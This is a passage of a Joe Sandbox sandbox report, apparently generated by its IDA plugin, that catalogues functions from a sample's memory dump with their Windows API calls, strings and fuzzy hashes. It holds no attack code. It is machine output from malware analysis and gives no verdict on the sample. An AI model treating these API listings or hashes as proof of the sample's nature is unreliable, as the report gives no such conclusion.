Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: d5af5a6a046b1d6f57cde3b5855195380607a5e0cf6646465f3e04d5d6aebdf0
Instruction ID: 3a5eba5189328cb79a8f4cb1a874094df375bb5bfe64ccee18a70f27f35f0c21
Opcode Fuzzy Hash: d5af5a6a046b1d6f57cde3b5855195380607a5e0cf6646465f3e04d5d6aebdf0
Instruction Fuzzy Hash: 6051B1316083019FC710EF14D992AAFB7E5EF86344F14892EF59957292DB31D909CAA3

Function 00079837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00079862
__swprintf.LIBCMT ref: 000798AC
__i64tow.LIBCMT ref: 000AF5E6

Strings

False, xrefs: 000AF5AE
%.15g, xrefs: 000798A6
0x%p, xrefs: 000AF5C8
True, xrefs: 000AF5A7

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: __i64tow__itow__swprintf
String ID: %.15g$0x%p$False$True
API String ID: 421087845-2263619337
Opcode ID: a7230c46e5c87aaf9a2800799195e72d441faf4c94cf65333e62438b54ee5ecb
Instruction ID: 47d55d88606e1ead39235c53832bd22d6ae448c32c6e5a355278901cc96618c5
Opcode Fuzzy Hash: a7230c46e5c87aaf9a2800799195e72d441faf4c94cf65333e62438b54ee5ecb
Instruction Fuzzy Hash: 0341C571D00606AFEF64DFB4D842EBA73E8EF06310F20846EE54DDB292EE7599419B11

Function 000F7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000F716A
CreateMenu.USER32 ref: 000F7185
SetMenu.USER32(?,00000000), ref: 000F7194
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000F7221
IsMenu.USER32(?), ref: 000F7237
CreatePopupMenu.USER32 ref: 000F7241
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000F726E
DrawMenuBar.USER32 ref: 000F7276

Strings

0, xrefs: 000F7160
F, xrefs: 000F7262

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0$F
API String ID: 176399719-3044882817
Opcode ID: 21faa093342b25136851b50d58d2303d0c094005c93e29569c77115aba52008a
Instruction ID: 40689bc8a7b53c88bb3dda2e050761195870485b4f47198e2051a5a046b182d9
Opcode Fuzzy Hash: 21faa093342b25136851b50d58d2303d0c094005c93e29569c77115aba52008a
Instruction Fuzzy Hash: 8A418C75A01209EFDB60DF64D884EAA7BF6FF48310F140029FA09A7361D731A910EF91

Function 000F74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 000F755E
CreateCompatibleDC.GDI32(00000000), ref: 000F7565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 000F7578
SelectObject.GDI32(00000000,00000000), ref: 000F7580
GetPixel.GDI32(00000000,00000000,00000000), ref: 000F758B
DeleteDC.GDI32(00000000), ref: 000F7594
GetWindowLongW.USER32(?,000000EC), ref: 000F759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 000F75B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 000F75BE

Strings

static, xrefs: 000F74F6

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 98c6d6d634313e216949ed087ef4a665c8facfb0cc3a30e8671e40691e17ffd3
Instruction ID: d5e1291ced533741f4f1a93aef9c8f0dc279f0e741c31f638b3469d18f63c4b6
Opcode Fuzzy Hash: 98c6d6d634313e216949ed087ef4a665c8facfb0cc3a30e8671e40691e17ffd3
Instruction Fuzzy Hash: 85317E72104619BBEF129F64DC08FFB3BA9FF09760F110224FA19965A0CB75D811EBA5

Function 00096E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00096E3E

Part of subcall function 00098B28: __getptd_noexit.LIBCMT ref: 00098B28

__gmtime64_s.LIBCMT ref: 00096ED7
__gmtime64_s.LIBCMT ref: 00096F0D
__gmtime64_s.LIBCMT ref: 00096F2A
__allrem.LIBCMT ref: 00096F80
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00096F9C
__allrem.LIBCMT ref: 00096FB3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00096FD1
__allrem.LIBCMT ref: 00096FE8
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00097006
__invoke_watson.LIBCMT ref: 00097077

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: e8298872cd2740d8ce6f5b141cb738dddc6f8374b5b56a2fa4d0cf2a813d0b3c
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: AB710776A00B16EBDF14EE78DC42B9AB7E8AF55324F148239F524D7282E771DD009790

Function 000D2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000D2542
GetMenuItemInfoW.USER32(00135890,000000FF,00000000,00000030), ref: 000D25A3
SetMenuItemInfoW.USER32(00135890,00000004,00000000,00000030), ref: 000D25D9
Sleep.KERNEL32(000001F4), ref: 000D25EB
GetMenuItemCount.USER32(?), ref: 000D262F
GetMenuItemID.USER32(?,00000000), ref: 000D264B
GetMenuItemID.USER32(?,-00000001), ref: 000D2675
GetMenuItemID.USER32(?,?), ref: 000D26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000D2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000D2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000D2735

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6e05ee5a04e78a48c9c960e615fe529c92baa61dd752ce0656dd3dc20a33dff4
Instruction ID: 987edb606627a1a5aa829d648f13a1d908bf9172ac886d9151fcc0499d6078dd
Opcode Fuzzy Hash: 6e05ee5a04e78a48c9c960e615fe529c92baa61dd752ce0656dd3dc20a33dff4
Instruction Fuzzy Hash: 7C618B7090474AAFEB21DF64D888DBE7BB9EB61704F14005AE841A7351D731AD45DB31

Function 000F6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 000F6FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 000F6FA8
GetWindowLongW.USER32(?,000000F0), ref: 000F6FCC
_memset.LIBCMT ref: 000F6FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000F6FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 000F7067

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 184d0cfc9ff30fe451c8e2f0e71fda2e9e8b38d8d6683e4c52c83455316c90a5
Instruction ID: 45eca1b4e121811eb0b319867340293efcaac6cc9acedb7fb2fb5ad069ce7d99
Opcode Fuzzy Hash: 184d0cfc9ff30fe451c8e2f0e71fda2e9e8b38d8d6683e4c52c83455316c90a5
Instruction Fuzzy Hash: F8616B75900208AFDB11DFA8CC81EFE77F9AF09710F144199FA15AB2A2C771AD45DB90

Function 000C6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000C6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 000C6C18
VariantInit.OLEAUT32(?), ref: 000C6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 000C6C4A
VariantCopy.OLEAUT32(?,?), ref: 000C6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 000C6CB1
VariantClear.OLEAUT32(?), ref: 000C6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 000C6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000C6CDC
VariantClear.OLEAUT32(?), ref: 000C6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000C6CF9

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 7b4fa3b0f90cc5207717fc0c74b69a88e4cedcf2807487987ea39c37e8ad6278
Instruction ID: 59fb539c1e95ad40ce84b576f2288f9954c108de2ad8ef3fbe8abf1fa3ee37df
Opcode Fuzzy Hash: 7b4fa3b0f90cc5207717fc0c74b69a88e4cedcf2807487987ea39c37e8ad6278
Instruction Fuzzy Hash: D1415135A0011A9FDF10DFA8D884EFEBBB9EF08350F008069F955E7261CB35A945DBA1

Function 000CFD09 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000CFD31
GetAsyncKeyState.USER32(000000A0), ref: 000CFDB2
GetKeyState.USER32(000000A0), ref: 000CFDCD
GetAsyncKeyState.USER32(000000A1), ref: 000CFDE7
GetKeyState.USER32(000000A1), ref: 000CFDFC
GetAsyncKeyState.USER32(00000011), ref: 000CFE14
GetKeyState.USER32(00000011), ref: 000CFE26
GetAsyncKeyState.USER32(00000012), ref: 000CFE3E
GetKeyState.USER32(00000012), ref: 000CFE50
GetAsyncKeyState.USER32(0000005B), ref: 000CFE68
GetKeyState.USER32(0000005B), ref: 000CFE7A

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4b46a16f37694174eaff20efe26ae7a95dba88e0001a4270f15cc6977fbf6b9e
Instruction ID: 6e218cd115f7fb27cb9b304ea564b248ec3128e1d34137012698dbdf3073ee5d
Opcode Fuzzy Hash: 4b46a16f37694174eaff20efe26ae7a95dba88e0001a4270f15cc6977fbf6b9e
Instruction Fuzzy Hash: 344199245047CB69FFB15B648804BBDBEE36F11744F0840BED6C6465D2DB9499C8C7A3

Function 000E83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00079837: __itow.LIBCMT ref: 00079862
Part of subcall function 00079837: __swprintf.LIBCMT ref: 000798AC

CoInitialize.OLE32 ref: 000E8403
CoUninitialize.OLE32 ref: 000E840E
CoCreateInstance.OLE32(?,00000000,00000017,00102BEC,?), ref: 000E846E
IIDFromString.OLE32(?,?), ref: 000E84E1
VariantInit.OLEAUT32(?), ref: 000E857B
VariantClear.OLEAUT32(?), ref: 000E85DC

Strings

Failed to create object, xrefs: 000E8479, 000E852F
NULL Pointer assignment, xrefs: 000E84B3
Invalid parameter, xrefs: 000E84FA

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: b831ae5f96e991a9f01c67298f666b04a0dffbf39c20e4dc6abbc25319e834a8
Instruction ID: 208a77efa278bea4ca75d332f74844e3abd0b111402de33edfa42b3afc2bf1a3
Opcode Fuzzy Hash: b831ae5f96e991a9f01c67298f666b04a0dffbf39c20e4dc6abbc25319e834a8
Instruction Fuzzy Hash: 6061AC716087529FD710DF15C848BAEBBE8EF49754F00841AF989AB2A1CF74ED44CB92

Function 000E5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000E5793
inet_addr.WSOCK32(?,?,?), ref: 000E57D8
gethostbyname.WSOCK32(?), ref: 000E57E4
IcmpCreateFile.IPHLPAPI ref: 000E57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000E5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000E5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 000E58ED
WSACleanup.WSOCK32 ref: 000E58F3

Strings

Ping, xrefs: 000E5816

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d644f6fcf062fc89f6d5eabe266f1a4c10e5ee4971dc0de243f5f98a1a34f2ce
Instruction ID: 1595059bc9d4e8688a70428707263fad2763e1515b108e051009eebad0662aaf
Opcode Fuzzy Hash: d644f6fcf062fc89f6d5eabe266f1a4c10e5ee4971dc0de243f5f98a1a34f2ce
Instruction Fuzzy Hash: FA51E0316047009FDB60EF25CD45B6AB7E4EF44315F048929F99AEB2A2DB34EC00DB42

Function 000DB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000DB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000DB546
GetLastError.KERNEL32 ref: 000DB550
SetErrorMode.KERNEL32(00000000,READY), ref: 000DB5BD

Strings

INVALID, xrefs: 000DB58F
UNKNOWN, xrefs: 000DB575
READY, xrefs: 000DB596
READONLY, xrefs: 000DB588
NOTREADY, xrefs: 000DB57C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 7a18bd3255e2f28dc66d3788dfa1e090ddc9206b966eb32d6eb74473b3f73582
Instruction ID: 1a1703fe483ffffc74b7be3eee4c639e3899024d105a70b7764fe6d94151f1d5
Opcode Fuzzy Hash: 7a18bd3255e2f28dc66d3788dfa1e090ddc9206b966eb32d6eb74473b3f73582
Instruction Fuzzy Hash: DD319E35A00709EFDB10DF68E885BBE77B4FF08310F11812AE50597396DB759A01CB61

Function 000C8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000C9014
GetDlgCtrlID.USER32 ref: 000C901F
GetParent.USER32 ref: 000C903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 000C903E
GetDlgCtrlID.USER32(?), ref: 000C9047
GetParent.USER32(?), ref: 000C9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 000C9066

Strings

ListBox, xrefs: 000C8FD1
ComboBox, xrefs: 000C8F9C

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: d0513091e073d2cf4204bdf99c6a49c28fb4af2d0317e2718a83907f41526ac8
Instruction ID: f0a3f2b970da811aa746485bb5457807f58be0b4cfaff36b4b7503200d6bb50a
Opcode Fuzzy Hash: d0513091e073d2cf4204bdf99c6a49c28fb4af2d0317e2718a83907f41526ac8
Instruction Fuzzy Hash: 5321C170E00109BFDF14ABA0CC89EFEBBB4EF49310F104159B925972E2DF795815DA24

Function 000C907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00077DE1: _memmove.LIBCMT ref: 00077E22

Part of subcall function 000CAA99: GetClassNameW.USER32(?,?,000000FF), ref: 000CAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000C90FD
GetDlgCtrlID.USER32 ref: 000C9108
GetParent.USER32 ref: 000C9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 000C9127
GetDlgCtrlID.USER32(?), ref: 000C9130
GetParent.USER32(?), ref: 000C914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 000C914F

Strings

ListBox, xrefs: 000C90BC
ComboBox, xrefs: 000C9087

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 1ddfeb971481ac99ef805d3645f6a586e10e6793490a61fe1bb6c647c7f01551
Instruction ID: c5e38beb26a0a583ad7269bfb927fae7ede551571b15ca5cb594bcdb86030fe4
Opcode Fuzzy Hash: 1ddfeb971481ac99ef805d3645f6a586e10e6793490a61fe1bb6c647c7f01551
Instruction Fuzzy Hash: 4921C574E00109BBDF11ABA4CC89FFEBBB4EF49300F104059B955972A2DB795815DB25

Function 000C9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000C916F
GetClassNameW.USER32(00000000,?,00000100), ref: 000C9184
_wcscmp.LIBCMT ref: 000C9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000C9211

Strings

largeicons, xrefs: 000C91A5
smallicons, xrefs: 000C91D9
SHELLDLL_DefView, xrefs: 000C9190
details, xrefs: 000C91BF
list, xrefs: 000C91F3

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.2195965110.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.00000000000FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196121186.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196204925.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2196231956.0000000000137000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_25IvlOVEB1.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 126325f906955b3ecd20da8a4ffb02f8199c28299bc2f3ce6ad05bcf4ad4bb6a
Instruction ID: 547d618ebe0ad51688afc15d1ac6b2b841698af95fd7f6a85be1d267efb3e30d
Opcode Fuzzy Hash: 126325f906955b3ecd20da8a4ffb02f8199c28299bc2f3ce6ad05bcf4ad4bb6a
Instruction Fuzzy Hash: ED11A776648317BAFE253724EC0FEFF779C9F15734B20002AF900A54D2EE615861A954

Function 000E88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000E88D7
CoInitialize.OLE32(00000000), ref: 000E8904
CoUninitialize.OLE32 ref: 000E890E
GetRunningObjectTable.OLE32(00000000,?), ref: 000E8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 000E8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00102C0C), ref: 000E8B6F
CoGetObject.OLE32(?,00000000,00102C0C,?), ref: 000E8B92
SetErrorMode.KERNEL32(00000000), ref: 000E8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000E8C25
VariantClear.OLEAUT32(?), ref: 000E8C35

Memory Dump Source

Source File: 00000000.00000002.2196007883.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

